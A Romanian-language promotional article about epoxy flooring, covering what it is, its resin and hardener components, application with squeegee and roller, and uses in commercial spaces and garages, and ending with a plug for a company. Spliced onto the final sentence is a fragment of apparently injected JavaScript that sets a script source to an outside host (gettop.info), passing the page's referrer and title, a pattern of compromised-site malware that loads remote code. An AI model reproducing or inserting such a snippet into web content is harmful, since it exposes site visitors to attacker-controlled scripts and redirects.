pardoseli epoxidice

pardoseli epoxidice

Nu este nimic mai simplu decat sa va transformati podelele macinate si cu aspect urat in pardoseli epoxidice. In acelasi timp, daca nu aveti suficienta experienta in prepararea ei, in mod cert veti vedea diferenta pe termen lung.

Ce sunt niste pardoseli epoxidice?

Este vorba despre un polimer care initial se afla sub forma de doua componente diferite si care se transforma intr-o stare solida printr-o reactie chimica controlata. Datorita acestei schimbari de consistenta mecanica si chimica, aceste pardoseli epoxidice au in mod natural o rezistenta buna. Adezivii pentru pardoseli epoxidice sunt foarte adezivi pe timpul schimbarii starii din lichid in solid, ceea ce le permite astfel sa creeze o legatura puternica cu podeaua din beton, indiferent daca acesta este veche sau noua.

In ceea ce priveste domeniile de aplicare, exista o varietate de aplicatii si utilizari in care se pot folosi aceste pardoseli epoxidice. De exemplu se pot folosi foarte bine in spatiile comerciale si industriale, unde se doreste o pardoseala care sa arate bine, care sa se pastreze foarte bine in timp si mai ales care sa se intretina usor.

Cum se aplica niste pardoseli epoxidice

Inainte sa aplicati niste pardoseli epoxidice trebuie sa tineti cont de faptul ca acestea, in general, sunt formate din doua componente principale: rasini si intaritori. Rasina din pardoselile epoxidice este componenta transparenta sau clara si practic inodora. In ceea ce priveste intaritorul, acesta este mai inchis la culoare si are un miros puternic, asemanator cu cel de amoniac. Atunci cand aceste doua componente sunt amestecate, in timpul procesului de aplicare, are loc o reactie chimica. Aceasta reactie chimica transforma materialul de pe pardoseala intr-un material dur, rigid, care seamana cu plasticul, pentru un rezultat foarte durabil, etans si rezistent la produse chimice.

Metoda de aplicare a acestui amestec din care rezulta dupa aceea aceste pardoseli epoxidice este realizata in general cu ajutorul unei raclete si a unei role. Aceasta aplicare este mai buna atunci cand se face de catre specialisti, care au experienta in astfel de lucrari si care stiu care trebuie sa fie grosimea stratului aplicat si care stiu cum anume trebuie intinsa compozitia, astfel incat sa se obtina un rezultat perfect din punct de vedere al design-ului, si care sa fie si foarte rezistent in timp, pentru ca acesta este o caracteristica esentiala a acestor pardoseli epoxidice, deoarece ele sunt destul de solicitate, mai ales daca este vorba de un spatiu comercial pentru trec mii de persoane, sau incinta unei fabrici, unde pardoselile sunt supuse la actiunii puternice, produse de utilajele de dimensiuni mari. Insa, daca doriti puteti sa montati pardoseli epoxidice chiar si acasa, cel mai preferat loc fiind garajul, unde aveti nevoie de o pardoseala rezistenta la socuri mecanice, dar si la produse chimice, mai ales daca sunteti o persoana careia ii place sa mestereasca in acesta incapere.

Prin urmare, daca aveti nevoie de podele care sa reziste la trafic, dar care sa aiba si un design usor de personalizat, in mod cert aveti nevoie de pardoseli epoxidice de la¬†Europlastic.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;